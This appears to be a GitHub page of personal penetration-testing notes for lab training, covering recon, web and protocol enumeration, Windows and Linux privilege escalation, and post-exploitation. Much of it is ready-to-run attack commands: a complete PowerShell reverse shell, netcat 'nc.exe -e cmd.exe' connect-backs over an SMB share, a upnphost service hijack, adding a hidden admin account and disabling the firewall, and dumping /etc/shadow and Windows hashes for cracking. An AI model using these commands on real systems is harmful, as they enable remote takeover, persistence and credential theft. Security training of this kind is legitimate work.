pentesting_notes icon indicating copy to clipboard operation
pentesting_notes copied to clipboard

verified publisher icon moshekaplan

Metadata

Pull requests welcome.

Preparing your environment

Clone the following repositories:

  • https://github.com/superkojiman/onetwopunch - Wrapper around nmap/unicorn scanner
  • https://github.com/AutoRecon/AutoRecon - Another recon script
  • https://github.com/codingo/Reconnoitre - Recon script with suggested follow-up commands
  • https://github.com/jivoi/pentest - Fully automated recon
  • https://github.com/danielmiessler/SecLists - Wordlists
  • https://github.com/mthbernardes/rsg - Reverse shell generator
  • https://github.com/rebootuser/LinEnum - Linux privesc enumeration
  • https://github.com/mzet-/linux-exploit-suggester - Linux privesc enumeration
  • https://github.com/TH3xACE/SUDO_KILLER - Bash script to search for sudo -l misconfigs
  • https://github.com/M4ximuss/Powerless - Windows privesc enumeration (non-powershell)
  • https://github.com/PowerShellMafia/PowerSploit - Windows Powershell-based privesc
  • https://github.com/411Hall/JAWS - Windows privesc enumeration (powershell)
  • https://github.com/absolomb/WindowsEnum - Windows privesc enumeration (powershell)
  • https://github.com/rasta-mouse/Sherlock - Windows kernel exploit checker
  • https://github.com/ankh2054/windows-pentest - Windows pentest scripts
  • https://github.com/SecWiki/windows-kernel-exploits - Precompiled Windows kernel exploits
  • https://github.com/51x/WHP - Collection of Windows attack tools and exploits
  • https://github.com/AusJock/Privilege-Escalation - Windows/Linux kernel exploits
  • https://github.com/3ndG4me/AutoBlue-MS17-010 - MS17-010 for multiple systems
  • https://github.com/GDSSecurity/Windows-Exploit-Suggester - Script that parses systeminfo output to suggest exploits

Or as a list of commands:

git clone --depth 1 https://github.com/superkojiman/onetwopunch.git
git clone --depth 1 https://github.com/AutoRecon/AutoRecon.git
git clone --depth 1 https://github.com/codingo/Reconnoitre.git
git clone --depth 1 https://github.com/jivoi/pentest.git
git clone --depth 1 https://github.com/danielmiessler/SecLists.git
git clone --depth 1 https://github.com/mthbernardes/rsg.git
git clone --depth 1 https://github.com/rebootuser/LinEnum.git
git clone --depth 1 https://github.com/mzet-/linux-exploit-suggester.git
git clone --depth 1 https://github.com/TH3xACE/SUDO_KILLER.git
git clone --depth 1 https://github.com/M4ximuss/Powerless.git
git clone --depth 1 https://github.com/411Hall/JAWS.git
git clone --depth 1 https://github.com/PowerShellMafia/PowerSploit.git
git clone --depth 1 https://github.com/absolomb/WindowsEnum.git
git clone --depth 1 https://github.com/rasta-mouse/Sherlock.git
git clone --depth 1 https://github.com/ankh2054/windows-pentest.git
git clone --depth 1 https://github.com/SecWiki/windows-kernel-exploits.git
git clone --depth 1 https://github.com/51x/WHP.git
git clone --depth 1 https://github.com/AusJock/Privilege-Escalation.git
git clone --depth 1 https://github.com/3ndG4me/AutoBlue-MS17-010.git
git clone --depth 1 https://github.com/GDSSecurity/Windows-Exploit-Suggester.git

Starting a pentest

Beginning a pentest against a host? Start with the following commands:

nmap -A -sV --script=default,vuln,smb-vuln* -p- --open -oA tcp_10.11.1.x 10.11.1.x
nmap -A -sV -sU --script=default,vuln --open -oA udp_10.11.1.x 10.11.1.x
echo "10.11.1.x" > 10.11.1.x_target.txt && ~/Desktop/tools/onetwopunch.sh  -i tap0 -t 10.11.1.x_target.txt
python3 ~/Desktop/tools/AutoRecon/autorecon.py "10.11.1.x" -v -o  ~/Desktop/oscp

Searchsploit can run with nmap output: searchsploit --nmap tcp_10.11.1.x.xml

Ideally, your goal is to enumerate your attack surface in as much detail as possible: all exposed services, with full details (version, modules, and configuration)

Don't forget to try default creds. Not all scripts have useful console output. Wireshark may be useful for manually reviewing if auth is successful.

See https://guide.offsecnewbie.com/general-methodology

Protocol specific notes

FTP

  • Scan for anonymous access
  • Filezilla fails to connect if the directory listing isn't allowed.
  • Always use binary mode when transferring files
  • FTP command line reference:
Connect: ftp <ip>
Binary mode:   binary
List files:    ls
Change dir:    cd
Download file: get <file>
Upload file:   put <file>

HTTP

HTTP consists of several components:

  • Web server
  • Programming language (if any)
  • Back-end platform/framework (Drupal, Wordpress, etc.) and plugins
  • Front-end UI

Other notes:

  • Each component has its own vulnerabilities. Front-end vulns are useful for XSS and the like.
  • A web server listens on one or more ports. It can also run multiple languages and multiple frameworks at different paths.

Web Servers:

  • Apache, nginx, and Microsoft IIS are most common.
  • Less-common webservers are more likely to have vulnerabilities and misconfigurations

Web scanners:

  • nikto to scan for vulns: nikto -h [IP] -p [PORT] -o "[OUTPUT].txt"
  • whatweb to detect versions: whatweb --aggression 2 www.example.com
  • gobuster to enumerate directories. gobuster -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://10.11.1.x:80
    • If you know you can create files on a web server, but aren't sure where they are, bruteforcing is acceptable
    • Recommended wordlists: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt and /usr/share/seclists/Discovery/Web-Content/common.txt

Coldfusion

Colfusion guide: https://www.slideshare.net/chrisgates/coldfusion-for-penetration-testers

Wordpress

wpscan --url www.example.com

LDAP

  • nmap -p 389 --script ldap-rootdse -Pn 1.2.3.4
  • nmap -p 389 --script ldap-search -Pn 1.2.3.4
  • ldapsearch -x -h 1.2.3.4 -s base namingcontexts
  • ldapsearch -x -h 1.2.3.4 -b "dc=lightweight,dc=htb"

SMB

For Linux targets running SMB, it may be possible to find a version number in the raw network traffic with Wireshark in the smb.native_lanman field.

Lessons Learned

Exploitation

If an exploit looks like it should be succesful, but is failing to connect back with a reverse shell, try cycling through common ports: 80, 443, 8080, 53

Try using other payloads besides reverse shell, if the exploit works. Adding an admin/root user and connecting via SSH/RDP is an alternative to an immediate root shell.

  • Reverse shell one-liners: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

General Privilege escalation

Concepts:

  • https://github.com/sagishahar/lpeworkshop

Ports for reverse shell

Trying to figure out if a port is available for further connect-back? Try nmap + wireshark

On compromised host, run: nmap -sV -P0 -p- 10.11.0.57

On attacker system, use the following wireshark filter: ip.src == 10.11.1.252 && tcp.flags.syn == 1 && tcp.flags.ack == 0

Lazy credentials

If you see lazy passwords in one place of admin/admin, expect that there might be lazy passwords in other places too.

Windows Privilege escalation

  • accesschk.exe /accepteula -c * for seeing services with RW access, so the service image path itself can be changed.
  • https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
  • Sometimes files may be hidden. Use dir /A instead of dir.
  • https://guif.re/windowseop
  • Show user information: net user username
  • Show information on group: net localgroup administrators
  • May have stored credentials: cmdkey /list
    • Escalate with: runas /user:ACCESS\Administrator /savecred "command"
  • Windows reverse shell: $client = New-Object System.Net.Sockets.TCPClient("10.10.12.84",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Run/Transfer/Exfil files with SMB:

SMB server on Kali box is easiest way to run/transfer/exfil files.

  • Start SMB server: python /usr/share/doc/python-impacket/examples/smbserver.py -smb2support share /www
    • Note: Some Windows hosts are locked down and only allow SMB2
  • Copy file: COPY \\10.10.12.84\share\PowerUp.ps1 PowerUp.ps1
  • Run command: \\10.10.12.84\share\nc.exe -nv -e cmd.exe 10.10.12.84 80

Second shell

After getting a shell, get a second shell with "start" in case the first one bugs up/hangs/crashes (assuming running SMB server): victim > start \\10.10.12.84\share\nc.exe -nv -e cmd.exe 10.10.12.84 80

XP SP1 (and earlier) privesc via upnphost:

sc config upnphost binpath= "C:\Inetpub\nc.exe -nv 10.11.0.X 5555 -e C:\Windows\system32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc config upnphost depend= ""
sc qc upnphost

Windows privesc enumeration scripts

  • powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt
  • https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc and download PowerUp.ps1
    • powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"

Windows commands to run as root:

  • Add new admin: net user hacker Winter2019! /add && net localgroup administrators hacker /add && net group administrators hacker /add
  • Disable windows firewall: NetSh Advfirewall set allprofiles state off

Windows Privesc online resources

  • https://www.roguesecurity.in/2018/12/02/a-guide-for-windows-penetration-testing/
  • https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
  • Exploits: http://www.bhafsec.com/wiki/index.php/Windows_Privilege_Escalation
  • http://www.fuzzysecurity.com/tutorials/16.html
  • https://toshellandback.com/2015/11/24/ms-priv-esc/

Linux Privilege escalation

Concepts

  • https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
  • Local Linux Enumeration & Privilege Escalation Cheatsheet (by author of LinEnum) - https://www.rebootuser.com/?p=1623
  • sudo -l abuse: https://bitvijays.github.io/LFC-VulnerableMachines.html#sudo-l-permissions

Scripts

  • LinEnum.sh -t -s

General Guidance

  • Compiling exploits: gcc -o sploit 9545.c -Wl,--hash-style=both

  • Recommended Kernel Exploits:

    • FreeBSD 9.0: https://www.exploit-db.com/exploits/28718
    • Ubuntu 16.04: https://www.exploit-db.com/exploits/39772
    • Linux 2.6.9-89.EL: https://www.exploit-db.com/exploits/9545
    • Linux beta 3.0.0-12-generic: https://gist.github.com/karthick18/1686299
    • Linux Kernel 2.6.39 to 3.2.2 (x86/x64) - 'Mempodipper' - https://www.exploit-db.com/exploits/35161
    • Linux core 2.6.32-21: https://www.exploit-db.com/exploits/14814/
    • Diverse unix: https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack/blob/master/2009/CVE-2009-2692/2.6.18.c & https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack
    • Diverse Windows: https://github.com/jivoi/pentest/blob/master/exploit_win/win_local_exploits.md

  • Exploiting services running as root that shouldn't be:

    • MySQL: https://www.exploit-db.com/exploits/1518

Post-rooting activities

  • Dump and crack hashes
    • Linux:
      • Dump: cat /etc/shadow or cat /etc/shadow
      • Crack:
    • Windows:
      • Dump hashes #1: wce32.exe -w or wce64.exe -w
      • Dump hashes #2: fgdump.exe && type *.pwdump
      • Crack with: https://hashkiller.co.uk/Cracker/NTLM
      • Or: john ./hashes.txt --format=nt --wordlist=/usr/share/wordlists/rockyou.txt
      • Or: hashcat -m 1000 hash.pwd /usr/share/wordlists/rockyou.txt --force
  • Look for interesting files only accessible to root/admin
    • Sensitive files in Desktop or Documents
    • Backup files
    • Sensitive data in Windows Registry

Transferring files:

  • Python HTTP Server: python -m SimpleHTTPServer <port>
  • Python SMB Server: python /usr/share/doc/python-impacket/examples/smbserver.py share /www
  • wget in VBS: https://github.com/pythonmaster41/Go-For-OSCP/blob/master/Useful_Scripts/FILE_TRANSFER_Script/2.VBS/transfer-command.txt

Writing Exploits:

  • https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/writing-exploits-for-win32-systems-from-scratch/
  • When in doubt, it may be wise to assume common badchars (\x00, CR, LF, )
  • Online assembler: https://defuse.ca/online-x86-assembler.htm

Online Resources

  • https://scund00r.com/all/oscp/2018/02/25/passing-oscp.html - Amazing resource on methodology
  • https://github.com/DigitalAftermath/EnumerationVisualized/wiki
  • https://forums.offensive-security.com/showthread.php?4689-Offensive-Security-s-Complete-Guide-to-Alpha
  • https://www.roguesecurity.in/2018/12/02/a-guide-for-windows-penetration-testing/
  • https://sushant747.gitbooks.io/total-oscp-guide/
  • https://blog.ropnop.com/transferring-files-from-kali-to-windows/ - File Transfer techniques
  • http://www.fuzzysecurity.com/tutorials/16.html
  • https://guif.re
  • https://jhalon.github.io/OSCP-Review/
  • https://scriptdotsh.com/index.php/2018/04/17/31-days-of-oscp-experience/
  • https://411hall.github.io/JAWS-Enumeration/
  • https://www.securitysift.com/offsec-pwb-oscp/
  • https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-3-practical-hacking-tips-and-tricks-c38486f5fc97
  • https://www.reddit.com/r/oscp/comments/a9e2yv/from_0_to_oscp_in_90days/

Metadata

38
Stars
9
Forks
Watchers

Owner

verified publisher icon moshekaplan

Metadata

Back